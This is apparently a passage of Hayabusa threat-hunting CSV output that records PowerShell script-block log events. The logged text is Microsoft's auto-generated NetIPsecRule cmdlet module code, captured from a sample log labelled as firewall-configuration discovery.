IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase2AuthSet')) { [object]$__cmdletization_value = ${Phase2AuthSet} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Phase2AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('KeyModule')) { [object]$__cmdletization_value = ${KeyModule} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'KeyModule'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowWatchKey')) { [object]$__cmdletization_value = ${AllowWatchKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowWatchKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowSetKey')) { [object]$__cmdletization_value = ${AllowSetKey} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'AllowSetKey'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalTunnelEndpoint')) { [object]$__cmdletization_value = ${LocalTunnelEndpoint} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelEndpoint')) { [object]$__cmdletization_value = ${RemoteTunnelEndpoint} 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpoint'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname')) { [object]$__cmdletization_value = ${RemoteTunnelHostname} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteTunnelEndpointDNSName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForwardPathLifetime')) { [object]$__cmdletization_value = ${ForwardPathLifetime} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 
'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxReturnPathLifetimeSeconds'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass')) { [object]$__cmdletization_value = ${EncryptedTunnelBypass} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'BypassTunnelIfEncrypted'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RequireAuthorization')) { [object]$__cmdletization_value = ${RequireAuthorization} $__cmdletization_methodParameter = Microsoft.PowerShell.,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 
+09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RequireAuthorization'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('User')) { [object]$__cmdletization_value = ${User} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Users'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Machine')) { [object]$__cmdletization_value = ${Machine} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Machines'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 
'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:LocalPort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:RemotePort'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InterfaceAlias')) { [object]$__cmdletization_value = ${InterfaceAlias} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceAlias'; ParameterType = 'System.Management.Automation.WildcardPattern[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('InterfaceType')) { [object]$__cmdletization_value = ${InterfaceType} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:InterfaceType'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecRule' function Show-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])][OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement')] param( [Parameter(ParameterSetName='EnumerateFull1')] [string] ${PolicyStore}, [Parameter(ParameterSetName='EnumerateFull1')] 
[string] ${GPOSession}, [Parameter(ParameterSetName='EnumerateFull1')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='EnumerateFull1')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='EnumerateFull1')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Dependents'; ParameterType = 'Microsoft.M",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"anagement.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameter.ParameterTypeName = 'Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/NetSecurityDeepEnumElement' $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('EnumerateFull', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Show-NetIPsecRule' function Find-NetIPsecRule { [CmdletBinding(PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance[]])] param( [Parameter(ParameterSetName='Find2')] [string] ${LocalAddress}, [Parameter(ParameterSetName='Find2', Mandatory=$true)] [string] ${RemoteAddress}, [Parameter(ParameterSetName='Find2')] [string] ${Protocol}, [Parameter(ParameterSetName='Find2')] [uint16] ${LocalPort}, [Parameter(ParameterSetName='Find2')] [uint16] ${RemotePort}, [Parameter(ParameterSetName='Find2')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='Find2')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='Find2')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { 
$__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false 
if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.UInt16'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; 
